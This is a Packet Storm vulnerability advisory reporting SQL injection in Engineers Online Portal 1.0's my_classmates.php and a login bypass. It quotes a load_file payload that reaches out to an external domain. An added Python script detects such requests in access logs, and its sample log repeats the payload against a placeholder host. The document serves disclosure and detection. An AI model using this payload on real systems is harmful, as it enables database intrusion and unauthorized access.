ID PACKETSTORM:164535 Type packetstorm Reporter nu11secur1ty Modified 2021-10-18T00:00:00
Description
`# Exploit Title: Engineers Online Portal 1.0 is vulnerable to three types
of SQL injection attacks.
# Author: nu11secur1ty
# Testing and Debugging: nu11secur1ty
# Date: 10.13.2021
# Vendor: https://www.sourcecodester.com/users/janobe
# Link: https://www.sourcecodester.com/php/13115/engineers-online-portal-php.html
[+] Exploit Source:
https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/janobe/CVE-nu11-101321
[+] Description:
The id parameter of my_classmates.php in the Engineers Online Portal app
appears to be vulnerable to three types of SQL injection
attack: boolean-based blind, error-based, and UNION query.
The payload '+(select load_file('\
hh2s4z961nps5mtx8px8zoud248ywq0erhf82yqn.nu11secur1tyexploit.net\ggc'))+'
was submitted in the id parameter.
This payload injects a SQL sub-query that calls MySQL's load_file function
with a UNC file path that references a URL on an external domain.
The application interacted with that domain, indicating that the injected
SQL query was executed.
The user login is also vulnerable to an SQL injection authentication bypass
through the "username" parameter.
----------------------------------------------------------------------------------------
`
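Added example, not part of the original advisory or the exploit repository: a log check for the request pattern described above, flagging my_classmates.php requests whose id value is not a plain number or carries a load_file call with a UNC-style path. It assumes Apache combined-format access logs and that legitimate id values are numeric; the log lines, client addresses and the host collab.example.test are constructed placeholders.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (Apache combined format, truncated).
SAMPLE_LOG = [
    '198.51.100.7 - - [13/Oct/2021:10:00:01 +0000] '
    '"GET /my_classmates.php?id=185 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [13/Oct/2021:10:00:05 +0000] '
    '"GET /my_classmates.php?id=%27%2B(select%20load_file'
    '(%27%5C%5Ccollab.example.test%5Cggc%27))%2B%27 HTTP/1.1" 200 5003',
    '198.51.100.7 - - [13/Oct/2021:10:00:09 +0000] '
    '"GET /index.php HTTP/1.1" 200 2210',
]

# Client address and request target from one log line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# load_file( followed by a quoted path that starts with a backslash (UNC style).
LOAD_FILE_UNC = re.compile(r"load_file\s*\(\s*['\"]\\", re.IGNORECASE)


def inspect_line(line):
    """Return (client, reasons) for a suspicious my_classmates.php request, else None."""
    match = REQUEST_RE.match(line)
    if not match:
        return None
    client, target = match.groups()
    url = urlsplit(target)
    if not url.path.endswith("/my_classmates.php"):
        return None
    reasons = []
    # parse_qs percent-decodes the value, so encoded quotes and backslashes are seen.
    for value in parse_qs(url.query, keep_blank_values=True).get("id", []):
        if not value.isdigit():  # assumption: a legitimate id is a plain integer
            reasons.append("non-numeric id")
        if LOAD_FILE_UNC.search(value):
            reasons.append("load_file with UNC path")
    return (client, reasons) if reasons else None


def scan(lines):
    """Collect every flagged request from an iterable of log lines."""
    return [hit for hit in map(inspect_line, lines) if hit]


if __name__ == "__main__":
    for client, reasons in scan(SAMPLE_LOG):
        print(client, ", ".join(reasons))
```

Only query-string parameters are covered here; a POST body does not appear in a standard access log and would need application-level or WAF logging.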
Title: Engineers Online Portal 1.0 SQL Injection
Published: 2021-10-18T00:00:00
Href: https://packetstormsecurity.com/files/164535/Engineers-Online-Portal-1.0-SQL-Injection.html
Source: https://packetstormsecurity.com/files/download/164535/eop10-sql.txt